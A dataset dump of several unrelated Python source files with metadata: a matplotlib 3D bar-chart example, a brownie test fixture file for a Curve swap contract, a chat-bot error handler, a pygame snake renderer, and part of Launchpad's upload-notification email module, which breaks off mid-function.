ret.extend([indx] * n) #[0,0,0,0...n,1,1,1,1....n]\n indx+=1\n return ret \n\ndef formatValue(v,pos):\n return f\"({v})\" if v < 0 else f\"[{v}]\"\n\n# https://matplotlib.org/stable/gallery/mplot3d/hist3d.html#sphx-glr-gallery-mplot3d-hist3d-py\n# https://www.youtube.com/watch?v=VMuT3llidTk&list=PLA0M1Bcd0w8xQx-X5a6eSEOYULNSnHN_p&index=4\ndef plot_examples_11():\n size_x_y = 73\n \n # Fixing random state for reproducibility\n np.random.seed(19680801)\n\n fig = plt.figure()\n ax_3d = fig.add_subplot(projection='3d')\n \n xpos = gen_x(size_x_y)\n ypos = gen_y(size_x_y)\n\n zpos = 0\n # Construct arrays with the dimensions for the 16 bars.\n dx_size_fig = dy_size_fig = 0.75 * np.ones_like(zpos)\n \n dz_value = np.random.randint(0, 10,size_x_y*size_x_y)\n indx = 0\n for i in dz_value:\n if indx%78==0:\n dz_value[indx] = 25\n indx+=1 \n\n \n # color bar (https://stackoverflow.com/questions/11950375/apply-color-map-to-mpl-toolkits-mplot3d-axes3d-bar3d)\n offset = dz_value + np.abs(0)\n fracs = offset.astype(float)/offset.max()\n norm = colors.Normalize(fracs.min(), fracs.max())\n color_values = cm.jet(norm(fracs.tolist()))\n\n ax_3d.bar3d(xpos, ypos, zpos, dx_size_fig, dy_size_fig, dz_value, color=color_values,zsort='average')\n ax_3d.set_xlabel('x')\n ax_3d.set_ylabel('y')\n ax_3d.set_zlabel('z')\n #ax_3d.xaxis.set_major_formatter(FixedFormatter(['',0,'',1,'',2,'',3]))\n #ax_3d.yaxis.set_major_formatter(FixedFormatter(['',0,'',1,'',2,'',3]))\n #ax_3d.yaxis.set_major_formatter(formatValue)\n #ax_3d.set_xlim(xmin=0)\n #ax_3d.set_ylim(ymin=0)\n #ax_3d.xaxis.set_major_locator(MultipleLocator(base=1))\n #ax_3d.yaxis.set_major_locator(MultipleLocator(base=1))\n\n #ax_3d.xaxis.set_major_formatter(FormatStrFormatter(\"%d\"))\n #ax_3d.yaxis.set_major_formatter(FormatStrFormatter(\"%d\"))\n #ax_3d.xaxis.set_major_locator(IndexLocator(base=1,offset=0.35))\n #ax_3d.yaxis.set_major_locator(IndexLocator(base=1,offset=0.35))\n\n plt.show()\n\nfrom matplotlib.animation import ArtistAnimation\nimport random\ndef plot_examples_11_animation():\n size_x_y = 10\n fig = plt.figure()\n ax_3d = fig.add_subplot(projection='3d')\n ax_3d.set_xlabel('x')\n ax_3d.set_ylabel('y')\n ax_3d.set_zlabel('z')\n\n xpos = gen_x(size_x_y)\n ypos = gen_y(size_x_y)\n zpos = 0\n dx_size_fig = dy_size_fig = 0.75\n dz_value = np.zeros(size_x_y*size_x_y)\n dz_value[0]=25\n frames = []\n\n for i in range(3):\n for index in range(len(dz_value)):\n dz_value[index] = dz_value[index]+random.randint(1,6)\n\n offset = dz_value + np.abs(0)\n fracs = offset.astype(float)/offset.max()\n norm = colors.Normalize(fracs.min(), fracs.max())\n color_values = cm.jet(norm(fracs.tolist()))\n\n line = ax_3d.bar3d(xpos, ypos, zpos, dx_size_fig, dy_size_fig, dz_value,color=color_values, zsort='average')\n frames.append([line])\n \n ani = ArtistAnimation(\n fig, # фигура для анимации\n frames,# кадры\n interval=150,# задержка между кадрами в ms\n blit=True,# двойная буферизация для плавной анимации\n repeat=True # зациклить анимацию\n )\n ani.save('output/plot_examples_11_animation.gif', writer='imagemagick', fps=60)\n plt.show()", "repo_name": "Jekahome/Python_Example", "sub_path": "matplotlib_chart/examples/plot_examples_11.py", "file_name": "plot_examples_11.py", "file_ext": "py", "file_size_in_byte": 3923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.cm.jet", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.cm.jet", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.animation.ArtistAnimation", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "1177718561", "text": "import pytest\nfrom brownie import compile_source\n\nINITIAL_PRICES = [int(1.2 * 10**18)] # eur\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef coins(ERC20Mock, accounts):\n yield [ERC20Mock.deploy(name, name, 18, {\"from\": accounts[0]})\n for name in ['USD', 'EUR']]\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef token(CurveTokenV4, accounts):\n yield CurveTokenV4.deploy(\"Curve EUR-USD\", \"crvEURUSD\", {\"from\": accounts[0]})\n\n\ndef _compiled_swap(token, coins, CurveCryptoSwap2):\n path = CurveCryptoSwap2._sources.get_source_path('CurveCryptoSwap2')\n with open(path, 'r') as f:\n source = f.read()\n source = source.replace(\"0x0000000000000000000000000000000000000001\", token.address)\n\n source = source.replace(\"0x0000000000000000000000000000000000000010\", coins[0].address)\n source = source.replace(\"0x0000000000000000000000000000000000000011\", coins[1].address)\n\n source = source.replace(\"1,#0\", str(10 ** (18 - coins[0].decimals())) + ',')\n source = source.replace(\"1,#1\", str(10 ** (18 - coins[1].decimals())) + ',')\n\n return compile_source(source).Vyper\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef compiled_swap(token, coins, CurveCryptoSwap2):\n return _compiled_swap(token, coins, CurveCryptoSwap2)\n\n\ndef _crypto_swap(compiled_swap, token, accounts):\n swap = compiled_swap.deploy(\n accounts[0],\n accounts[0],\n 90 * 2**2 * 10000, # A\n int(2.8e-4 * 1e18), # gamma\n int(8.5e-5 * 1e10), # mid_fee\n int(1.3e-3 * 1e10), # out_fee\n 10**10, # allowed_extra_profit\n int(0.012 * 1e18), # fee_gamma\n int(0.55e-5 * 1e18), # adjustment_step\n 0, # admin_fee\n 600, # ma_half_time\n INITIAL_PRICES[0],\n {'from': accounts[0]})\n token.set_minter(swap, {\"from\": accounts[0]})\n\n return swap\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef crypto_swap(compiled_swap, token, accounts):\n return _crypto_swap(compiled_swap, token, accounts)\n\n\ndef _crypto_swap_with_deposit(crypto_swap, coins, accounts):\n user = accounts[1]\n quantities = [10**6 * 10**36 // p for p in [10**18] + INITIAL_PRICES] # $3M worth\n for coin, q in zip(coins, quantities):\n coin._mint_for_testing(user, q)\n coin.approve(crypto_swap, 2**256-1, {'from': user})\n\n # Very first deposit\n crypto_swap.add_liquidity(quantities, 0, {'from': user})\n\n return crypto_swap\n\n\n@pytest.fixture(scope=\"module\")\ndef crypto_swap_with_deposit(crypto_swap, coins, accounts):\n return _crypto_swap_with_deposit(crypto_swap, coins, accounts)\n\n\n@pytest.fixture(autouse=True)\ndef isolation(fn_isolation):\n pass\n", "repo_name": "hoanghiepnb/curve-crypto-contract", "sub_path": "tests/twocrypto/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2728, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}, {"api_name": "brownie.compile_source", "line_number": 30, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 58, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "12946132372", "text": "import traceback\nfrom io import StringIO\nfrom utils.config import init_config\nfrom utils.text2img import markdownToImg\nfrom graia.ariadne.app import Ariadne\nfrom graia.ariadne.message.chain import MessageChain\nfrom graia.ariadne.message.element import Image, Plain\nfrom graia.ariadne.util.saya import listen\nfrom graia.broadcast.builtin.event import ExceptionThrowed\nfrom graia.ariadne.event.message import GroupMessage\nfrom graia.saya import Channel\n\nchannel = Channel.current()\nmasterNumber = init_config().permission.Master\n\n\n@listen(ExceptionThrowed)\nasync def except_handle(event: ExceptionThrowed):\n if isinstance(event.event, ExceptionThrowed):\n return\n app = Ariadne.current()\n with StringIO() as fp:\n traceback.print_tb(event.exception.__traceback__, file=fp)\n tb = fp.getvalue()\n\n msg = f\"\"\"\\\n## 异常事件:\n{str(event.event.__repr__())}\n## 异常类型:\n`{type(event.exception)}`\n## 异常内容:\n{str(event.exception)}\n## 异常追踪:\n```py\n{tb}\n```\n\n\"\"\"\n\n await app.send_friend_message(\n masterNumber,\n MessageChain(Plain(\"发生了咩有捕获的异常捏\"), Image(path=await markdownToImg(msg))),\n )\n\n\n@listen(GroupMessage)\nasync def error_handler_test(msg: MessageChain):\n if str(msg) == \".错误捕捉测试\":\n raise ValueError(\"错误捕捉测试\")\n", "repo_name": "zzzzz167/Yuki", "sub_path": "cores/errorHandler.py", "file_name": "errorHandler.py", "file_ext": "py", "file_size_in_byte": 1337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "graia.saya.Channel.current", "line_number": 13, "usage_type": "call"}, {"api_name": "graia.saya.Channel", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.config.init_config", "line_number": 14, "usage_type": "call"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 18, "usage_type": "name"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 19, "usage_type": "argument"}, {"api_name": "graia.ariadne.app.Ariadne.current", "line_number": 21, "usage_type": "call"}, {"api_name": "graia.ariadne.app.Ariadne", "line_number": 21, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 22, "usage_type": "call"}, {"api_name": "traceback.print_tb", "line_number": 23, "usage_type": "call"}, {"api_name": "graia.ariadne.message.chain.MessageChain", "line_number": 42, "usage_type": "call"}, {"api_name": "graia.ariadne.message.element.Plain", "line_number": 42, "usage_type": "call"}, {"api_name": "graia.ariadne.message.element.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.text2img.markdownToImg", "line_number": 42, "usage_type": "call"}, {"api_name": "graia.ariadne.util.saya.listen", "line_number": 17, "usage_type": "call"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 17, "usage_type": "argument"}, {"api_name": "graia.ariadne.message.chain.MessageChain", "line_number": 47, "usage_type": "name"}, {"api_name": "graia.ariadne.util.saya.listen", "line_number": 46, "usage_type": "call"}, {"api_name": "graia.ariadne.event.message.GroupMessage", "line_number": 46, "usage_type": "argument"}]} +{"seq_id": "38573485240", "text": "import pygame\nimport math\n\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\nCOLOURS = [\n (230, 25, 75),\n (60, 180, 75),\n (255, 225, 25),\n (0, 130, 200),\n (245, 130, 48),\n (145, 30, 180),\n (70, 240, 240),\n (240, 50, 230),\n (210, 245, 60),\n (250, 190, 212),\n (0, 128, 128),\n (220, 190, 255),\n (170, 110, 40),\n (255, 250, 200),\n (128, 0, 0),\n (170, 255, 195),\n (128, 128, 0),\n (255, 215, 180),\n (0, 0, 128),\n (128, 128, 128),\n]\n\nclass Window:\n def __init__(self, window, game, width, height):\n self.game = game\n self.window = window\n \n # The scoreboard is where all the scores will be printed\n self.scoreboard = pygame.Surface(self.window.get_size())\n self.font = pygame.font.SysFont(None, 24)\n\n\n # Create some constants (assuming area is square)\n self.tile_size = math.floor(min(self.window.get_size()) / self.game.grid_size[1])\n self.body_size = math.floor(self.tile_size * 0.9)\n self.body_tile_offset = (self.tile_size - self.body_size) / 2\n self.candy_radius = self.tile_size * 0.6 / 2\n\n def update(self):\n BLACK = (0, 0, 0)\n self.window.fill(BLACK)\n\n # Draw snake\n for index, snake in enumerate(self.game.snakes):\n for position in snake:\n pygame.draw.rect(self.window, COLOURS[index], (\n (position[0] * self.tile_size) + self.body_tile_offset, \n (position[1] * self.tile_size) + self.body_tile_offset, \n self.body_size, self.body_size\n ))\n\n # Draw candies\n for candy in self.game.candies:\n pygame.draw.circle(self.window, COLOURS[-1], (\n (candy[0] + 0.5) * self.tile_size, \n (candy[1] + 0.5) * self.tile_size, \n ), self.candy_radius)\n\n", "repo_name": "Rayman/coding-challenge-snakes", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 1882, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.Surface", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.font.SysFont", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 41, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "36042340434", "text": "__metaclass__ = type\n\n__all__ = [\n 'notify',\n ]\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\nimport os\n\nfrom zope.component import getUtility\n\nfrom lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.archivepublisher.utils import get_ppa_reference\nfrom lp.archiveuploader.changesfile import ChangesFile\nfrom lp.archiveuploader.utils import (\n ParseMaintError,\n safe_fix_maintainer,\n )\nfrom lp.registry.interfaces.person import IPersonSet\nfrom lp.registry.interfaces.pocket import PackagePublishingPocket\nfrom lp.services.config import config\nfrom lp.services.encoding import (\n ascii_smash,\n guess as guess_encoding,\n )\nfrom lp.services.mail.helpers import get_email_template\nfrom lp.services.mail.sendmail import (\n format_address,\n format_address_for_person,\n sendmail,\n )\nfrom lp.services.webapp import canonical_url\nfrom lp.soyuz.interfaces.archivepermission import IArchivePermissionSet\n\n\ndef reject_changes_file(blamer, changes_file_path, changes, archive,\n distroseries, reason, logger=None):\n \"\"\"Notify about a rejection where all of the details are not known.\n\n :param blamer: The `IPerson` that is to blame for this notification.\n :param changes_file_path: The path to the changes file.\n :param changes: A dictionary of the parsed changes file.\n :param archive: The `IArchive` the notification is regarding.\n :param distroseries: The `IDistroSeries` the notification is regarding.\n :param reason: The reason for the rejection.\n \"\"\"\n ignored, filename = os.path.split(changes_file_path)\n information = {\n 'SUMMARY': reason,\n 'CHANGESFILE': '',\n 'DATE': '',\n 'CHANGEDBY': '',\n 'MAINTAINER': '',\n 'SIGNER': '',\n 'ORIGIN': '',\n 'ARCHIVE_URL': '',\n 'USERS_ADDRESS': config.launchpad.users_address,\n }\n subject = '%s rejected' % filename\n if archive and archive.is_ppa:\n subject = '[PPA %s] %s' % (get_ppa_reference(archive), subject)\n information['ARCHIVE_URL'] = '\\n%s' % canonical_url(archive)\n template = get_template(archive, 'rejected')\n body = template % information\n to_addrs = get_upload_notification_recipients(\n blamer, archive, distroseries, logger, changes=changes)\n debug(logger, \"Sending rejection email.\")\n if not to_addrs:\n debug(logger, \"No recipients have a preferred email.\")\n return\n send_mail(None, archive, to_addrs, subject, body, False, logger=logger)\n\n\ndef get_template(archive, action):\n \"\"\"Return the appropriate e-mail template.\"\"\"\n template_name = 'upload-'\n if action in ('new', 'accepted', 'announcement'):\n template_name += action\n elif action == 'unapproved':\n template_name += 'accepted'\n elif action == 'rejected':\n template_name += 'rejection'\n if archive.is_ppa:\n template_name = 'ppa-%s' % template_name\n template_name += '.txt'\n return get_email_template(template_name, app='soyuz')\n\n\nACTION_DESCRIPTIONS = {\n 'new': 'New',\n 'unapproved': 'Waiting for approval',\n 'rejected': 'Rejected',\n 'accepted': 'Accepted',\n 'announcement': 'Accepted',\n }\n\n\ndef calculate_subject(spr, bprs, customfiles, archive, distroseries,\n pocket, action):\n \"\"\"Return the e-mail subject for the notification.\"\"\"\n suite = distroseries.getSuite(pocket)\n names = set()\n version = '-'\n if spr:\n names.add(spr.name)\n version = spr.version\n elif bprs:\n names.add(bprs[0].build.source_package_release.name)\n version = bprs[0].build.source_package_release.version\n for custom in customfiles:\n names.add(custom.libraryfilealias.filename)\n name_str = ', '.join(names)\n subject = '[%s/%s] %s %s (%s)' % (\n distroseries.distribution.name, suite, name_str, version,\n ACTION_DESCRIPTIONS[action])\n if archive.is_ppa:\n subject = '[PPA %s] %s' % (get_ppa_reference(archive), subject)\n return subject\n\n\ndef notify(blamer, spr, bprs, customfiles, archive, distroseries, pocket,\n summary_text=None, changes=None, changesfile_content=None,\n changesfile_object=None, action=None, dry_run=False,\n logger=None, announce_from_person=None, previous_version=None):\n \"\"\"Notify about an upload or package copy.\n\n :param blamer: The `IPerson` who is to blame for this notification.\n :param spr: The `ISourcePackageRelease` that was created.\n :param bprs: A list of `IBinaryPackageRelease` that were created.\n :param customfiles: An `ILibraryFileAlias` that was created.\n :param archive: The target `IArchive`.\n :param distroseries: The target `IDistroSeries`.\n :param pocket: The target `PackagePublishingPocket`.\n :param summary_text: The summary of the notification.\n :param changes: A dictionary of the parsed changes file.\n :param changesfile_content: The raw content of the changes file, so it\n can be attached to the mail if desired.\n :param changesfile_object: The raw object of the changes file. Only used\n to work out the filename for `reject_changes_file`.\n :param action: A string of what action to notify for, such as 'new',\n 'accepted'.\n :param dry_run: If True, only log the mail.\n :param announce_from_person: If passed, use this `IPerson` as the From: in\n announcement emails. If the person has no preferred email address,\n the person is ignored and the default From: is used instead.\n :param previous_version: If specified, the change log on the email will\n include all of the source package's change logs after that version\n up to and including the passed spr's version.\n \"\"\"\n # If this is a binary or mixed upload, we don't send *any* emails\n # provided it's not a rejection or a security upload:\n if (\n bprs and action != 'rejected' and\n pocket != PackagePublishingPocket.SECURITY):\n debug(logger, \"Not sending email; upload is from a build.\")\n return\n\n if spr and spr.source_package_recipe_build and action == 'accepted':\n debug(logger, \"Not sending email; upload is from a recipe.\")\n return\n\n if spr is None and not bprs and not customfiles:\n # We do not have enough context to do a normal notification, so\n # reject what we do have.\n if changesfile_object is None:\n return\n reject_changes_file(\n blamer, changesfile_object.name, changes, archive, distroseries,\n summary_text, logger=logger)\n return\n\n # \"files\" will contain a list of tuples of filename,component,section.\n # If files is empty, we don't need to send an email if this is not\n # a rejection.\n try:\n files = build_uploaded_files_list(spr, bprs, customfiles, logger)\n except LanguagePackEncountered:\n # Don't send emails for language packs.\n return\n\n if not files and action != 'rejected':\n return\n\n recipients = get_upload_notification_recipients(\n blamer, archive, distroseries, logger, changes=changes, spr=spr,\n bprs=bprs)\n\n # There can be no recipients if none of the emails are registered\n # in LP.\n if not recipients:\n debug(logger, \"No recipients on email, not sending.\")\n return\n\n if action == 'rejected':\n default_recipient = \"%s <%s>\" % (\n config.uploader.default_recipient_name,\n config.uploader.default_recipient_address)\n if not recipients:\n recipients = [default_recipient]\n debug(logger, \"Sending rejection email.\")\n summarystring = summary_text\n else:\n summary = build_summary(spr, files, action)\n if summary_text:\n summary.append(summary_text)\n summarystring = \"\\n\".join(summary)\n\n attach_changes = not archive.is_ppa\n\n def build_and_send_mail(action, recipients, from_addr=None, bcc=None,\n previous_version=None):\n subject = calculate_subject(\n spr, bprs, customfiles, archive, distroseries, pocket, action)\n body = assemble_body(\n blamer, spr, bprs, archive, distroseries, summarystring, changes,\n action, previous_version=previous_version)\n body = body.encode(\"utf8\")\n send_mail(\n spr, archive, recipients, subject, body, dry_run,\n changesfile_content=changesfile_content,\n attach_changes=attach_changes, from_addr=from_addr, bcc=bcc,\n logger=logger)\n\n build_and_send_mail(\n action, recipients, previous_version=previous_version)\n\n info = fetch_information(spr, bprs, changes)\n from_addr = info['changedby']\n if announce_from_person is not None:\n if announce_from_person.preferredemail is not None:\n from_addr = format_address_for_person(announce_from_person)\n\n # If we're sending an acceptance notification for a non-PPA upload,\n # announce if possible. Avoid announcing backports, binary-only\n # security uploads, or autosync uploads.\n if (action == 'accepted' and distroseries.changeslist\n and not archive.is_ppa\n and pocket != PackagePublishingPocket.BACKPORTS\n and not (pocket == PackagePublishingPocket.SECURITY and spr is None)\n and not is_auto_sync_upload(spr, bprs, pocket, from_addr)):\n name = None\n bcc_addr = None\n if spr:\n name = spr.name\n elif bprs:\n name = bprs[0].build.source_package_release.name\n if name:\n email_base = distroseries.distribution.package_derivatives_email\n if email_base:\n bcc_addr = email_base.format(package_name=name)\n\n build_and_send_mail(\n 'announcement', [str(distroseries.changeslist)], from_addr,\n bcc_addr, previous_version=previous_version)\n\n\ndef assemble_body(blamer, spr, bprs, archive, distroseries, summary, changes,\n action, previous_version=None):\n \"\"\"Assemble the e-mail notification body.\"\"\"\n if changes is None:\n changes = {}\n info = fetch_information(\n spr, bprs, changes, previous_version=previous_version)\n information = {\n 'STATUS': ACTION_DESCRIPTIONS[action],\n 'SUMMARY': summary,\n 'DATE': 'Date: %s' % info['date'],\n 'CHANGESFILE': info['changelog'],\n 'DISTRO': distroseries.distribution.title,\n 'ANNOUNCE': 'No announcement sent',\n 'CHANGEDBY': '',\n 'MAINTAINER': '',\n 'ORIGIN': '',\n 'SIGNER': '',\n 'SPR_URL': '',\n 'ARCHIVE_URL': '\\n%s' % canonical_url(archive),\n 'USERS_ADDRESS': config.launchpad.users_address,\n }\n if spr:\n # Yay, circular imports.\n from lp.soyuz.model.distroseriessourcepackagerelease import (\n DistroSeriesSourcePackageRelease,\n )\n dsspr = DistroSeriesSourcePackageRelease(distroseries, spr)\n information['SPR_URL'] = canonical_url(dsspr)\n changedby_displayname = info['changedby_displayname']\n if changedby_displayname:\n information['CHANGEDBY'] = '\\nChanged-By: %s' % changedby_displayname\n origin = changes.get('Origin')\n if origin:\n information['ORIGIN'] = '\\nOrigin: %s' % origin\n if action == 'unapproved':\n information['SUMMARY'] += (\n \"\\nThis upload awaits approval by a distro manager\\n\")\n if distroseries.changeslist:\n information['ANNOUNCE'] = \"Announcing to %s\" % (\n distroseries.changeslist)\n\n # Some syncs (e.g. from Debian) will involve packages whose\n # changed-by person was auto-created in LP and hence does not have a\n # preferred email address set. We'll get a None here.\n changedby_person = email_to_person(info['changedby'])\n\n if blamer is not None and blamer != changedby_person:\n signer_signature = person_to_email(blamer)\n if signer_signature != info['changedby']:\n information['SIGNER'] = '\\nSigned-By: %s' % signer_signature\n # Add maintainer if present and different from changed-by.\n maintainer = info['maintainer']\n changedby = info['changedby']\n if maintainer and maintainer != changedby:\n information['MAINTAINER'] = '\\nMaintainer: %s' % maintainer\n return get_template(archive, action) % information\n\n\ndef send_mail(\n spr, archive, to_addrs, subject, mail_text, dry_run, from_addr=None,\n bcc=None, changesfile_content=None, attach_changes=False, logger=None):\n \"\"\"Send an email to to_addrs with the given text and subject.\n\n :param spr: The `ISourcePackageRelease` to be notified about.\n :param archive: The target `IArchive`.\n :param to_addrs: A list of email addresses to be used as recipients.\n Each email must be a valid ASCII str instance or a unicode one.\n :param subject: The email's subject.\n :param mail_text: The text body of the email. Unicode is preserved in the\n email.\n :param dry_run: Whether or not an email should actually be sent. But\n please note that this flag is (largely) ignored.\n :param from_addr: The email address to be used as the sender. Must be a\n valid ASCII str instance or a unicode one. Defaults to the email\n for config.uploader.\n :param bcc: Optional email Blind Carbon Copy address(es).\n :param param changesfile_content: The content of the actual changesfile.\n :param attach_changes: A flag governing whether the original changesfile\n content shall be attached to the email.\n \"\"\"\n extra_headers = {'X-Katie': 'Launchpad actually'}\n\n # Include the 'X-Launchpad-PPA' header for PPA upload notfications\n # containing the PPA owner name.\n if archive.is_ppa:\n extra_headers['X-Launchpad-PPA'] = get_ppa_reference(archive)\n\n # Include a 'X-Launchpad-Component' header with the component and\n # the section of the source package uploaded in order to facilitate\n # filtering on the part of the email recipients.\n if spr:\n xlp_component_header = 'component=%s, section=%s' % (\n spr.component.name, spr.section.name)\n extra_headers['X-Launchpad-Component'] = xlp_component_header\n\n if from_addr is None:\n from_addr = format_address(\n config.uploader.default_sender_name,\n config.uploader.default_sender_address)\n\n # `sendmail`, despite handling unicode message bodies, can't\n # cope with non-ascii sender/recipient addresses, so ascii_smash\n # is used on all addresses.\n\n # All emails from here have a Bcc to the default recipient.\n bcc_text = format_address(\n config.uploader.default_recipient_name,\n config.uploader.default_recipient_address)\n if bcc:\n bcc_text = \"%s, %s\" % (bcc_text, bcc)\n extra_headers['Bcc'] = ascii_smash(bcc_text)\n\n recipients = ascii_smash(\", \".join(to_addrs))\n if isinstance(from_addr, unicode):\n # ascii_smash only works on unicode strings.\n from_addr = ascii_smash(from_addr)\n else:\n from_addr.encode('ascii')\n\n if dry_run and logger is not None:\n debug(logger, \"Would have sent a mail:\")\n else:\n debug(logger, \"Sent a mail:\")\n debug(logger, \" Subject: %s\" % subject)\n debug(logger, \" Sender: %s\" % from_addr)\n debug(logger, \" Recipients: %s\" % recipients)\n if 'Bcc' in extra_headers:\n debug(logger, \" Bcc: %s\" % extra_headers['Bcc'])\n debug(logger, \" Body:\")\n for line in mail_text.splitlines():\n if isinstance(line, str):\n line = line.decode('utf-8', 'replace')\n debug(logger, line)\n\n if not dry_run:\n # Since we need to send the original changesfile as an\n # attachment the sendmail() method will be used as opposed to\n # simple_sendmail().\n message = MIMEMultipart()\n message['from'] = from_addr\n message['subject'] = subject\n message['to'] = recipients\n\n # Set the extra headers if any are present.\n for key, value in extra_headers.iteritems():\n message.add_header(key, value)\n\n # Add the email body.\n message.attach(\n MIMEText(sanitize_string(mail_text).encode('utf-8'),\n 'plain', 'utf-8'))\n\n if attach_changes:\n # Add the original changesfile as an attachment.\n if changesfile_content is not None:\n changesfile_text = sanitize_string(changesfile_content)\n else:\n changesfile_text = (\"Sorry, changesfile not available.\")\n\n attachment = MIMEText(\n changesfile_text.encode('utf-8'), 'plain', 'utf-8')\n attachment.add_header(\n 'Content-Disposition',\n 'attachment; filename=\"changesfile\"')\n message.attach(attachment)\n\n # And finally send the message.\n sendmail(message)\n\n\ndef sanitize_string(s):\n \"\"\"Make sure string does not trigger 'ascii' codec errors.\n\n Convert string to unicode if needed so that characters outside\n the (7-bit) ASCII range do not cause errors like these:\n\n 'ascii' codec can't decode byte 0xc4 in position 21: ordinal\n not in range(128)\n \"\"\"\n if isinstance(s, unicode):\n return s\n else:\n return guess_encoding(s)\n\n\ndef debug(logger, msg, *args, **kwargs):\n \"\"\"Shorthand debug notation for publish() methods.\"\"\"\n if logger is not None:\n logger.debug(msg, *args, **kwargs)\n\n\ndef is_valid_uploader(person, distribution):\n \"\"\"Is `person` an uploader for `distribution`?\n\n A `None` person is not an uploader.\n \"\"\"\n if person is None:\n return None\n else:\n return not getUtility(IArchivePermissionSet).componentsForUploader(\n distribution.main_archive, person).is_empty()\n\n\ndef get_upload_notification_recipients(blamer, archive, distroseries,\n logger=None, changes=None, spr=None,\n bprs=None):\n \"\"\"Return a list of recipients for notification emails.\"\"\"\n debug(logger, \"Building recipients list.\")\n candidate_recipients = [blamer]\n info = fetch_information(spr, bprs, changes)\n\n changer = email_to_person(info['changedby'])\n maintainer = email_to_person(info['maintainer'])\n\n if blamer is None and not archive.is_copy:\n debug(logger, \"Changes file is unsigned; adding changer as recipient.\")\n candidate_recipients.append(changer)\n\n if archive.is_ppa:\n # For PPAs, any person or team mentioned explicitly in the\n # ArchivePermissions as uploaders for the archive will also\n # get emailed.\n candidate_recipients.extend([\n permission.person\n for permission in archive.getUploadersForComponent()])\n elif archive.is_copy:\n # For copy archives, notifying anyone else will probably only\n # confuse them.\n pass\n else:\n # If this is not a PPA, we also consider maintainer and changed-by.\n if blamer is not None:\n if is_valid_uploader(maintainer, distroseries.distribution):\n debug(logger, \"Adding maintainer to recipients\")\n candidate_recipients.append(maintainer)\n\n if is_valid_uploader(changer, distroseries.distribution):\n debug(logger, \"Adding changed-by to recipients\")\n candidate_recipients.append(changer)\n\n # Collect email addresses to notify. Skip persons who do not have a\n # preferredemail set, such as people who have not activated their\n # Launchpad accounts (and are therefore not expecting this email).\n recipients = [\n format_address_for_person(person)\n for person in filter(None, set(candidate_recipients))\n if 